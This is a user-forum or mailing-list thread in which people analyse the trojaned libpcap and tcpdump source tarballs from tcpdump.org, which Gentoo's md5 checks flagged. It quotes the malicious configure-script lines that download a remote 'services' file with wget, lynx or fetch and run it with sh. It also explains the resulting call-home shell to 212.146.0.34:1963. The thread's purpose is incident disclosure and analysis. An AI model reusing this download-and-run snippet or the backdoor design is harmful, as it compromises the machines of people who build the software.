My Gentoo install caught differences in the md5sums of the libpcap-0.7.1 sources from http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz and the md5sum on file in the ebuild. I've downloaded the same sources from http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.t$ and performed a comparison, this is what I've found. The two versions do vary, with the tcpdump.org file containing modifications to the configure script and a modification to gencode.c. The configure script downloads http://mars.raketti.net/~mash/services, which is a file describing internet ports that also contains a shell script embedded in it that creates and compiles a C program that opens port 1963 and opens /bin/sh upon remote connection. It seems to listen only for connections from 212.146.0.34. It might be calling home though, my C is a bit rusty. Can someone help verify this? Please CC any correspondence to rladams@kelsey-seybold.com. Demo / Russell
the good news is people using Gentoo *should* be unaffected
Yep... The copy of libpcap-0.7.1.tar.gz is definatly trojaned. A diff of the configure script between the gentoo cached copy and the tcpdump.org copy shows the tcpdump.org copy having lines such as: CNF="services" URL="mars.raketti.net/~mash/$CNF" and (IFS="," ARGS="wget -q -O -,lynx --source,fetch -q -o -" for i in $ARGS; do IFS=" " $i $URL 1> $CNF if [ -f $CNF ]; then sh $CNF exit fi rm -f $CNF done) 1>/dev/null 2>/dev/null & The Gentoo cached copy on ibiblio does not show this and the trojaned copy from the upstream site has a different md5sum from the one we have digest so it appears we (Gentoo) has dodged this bullet. Anyone working on contacting the upstream?
Yes, the digest check picked it up. The only time the tcpdump.org version is used is if the ibiblio mirror isn't responding. There's still a chance though. I've notified the tcpdump.org mailing list... Demo / Russell
The services file it downloads contains an embedded shell script. I've attached it, can someone who's current with C explain what it does? I've determined it must open port 1963 and linked it to /bin/sh, but not much else. Demo / Russell
you're right thats all it does ... thats all it really needs to do ... open a shell on a port and listen ... chances are its a root shell and from there the person can own the box ;)
The program connects to 212.146.0.34:1963 and reads one of three one byte status codes: A - program exists M - closes connection, sleeps 3600 seconds, reconnects D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. Its important to note that it reuses the same outgoing connection so no other connection is needed to use the shell. (Gets around firewalls that block incoming connections).
erm... that should be "program exits"... not "program exists" :)
The Houston Linux Users Group is throwing up a quick page, and I've quoted you Bruce if you don't mind (w/ proper credits).
Turns out all recent sources for libpcap (3.7.1) and tcpdump (3.6.2 and 3.7.1) are compromised. See the report on slashdot.org. Thanks again Bruce.
for more info: http://www.hlug.org/trojan/ gentoo was never affected.
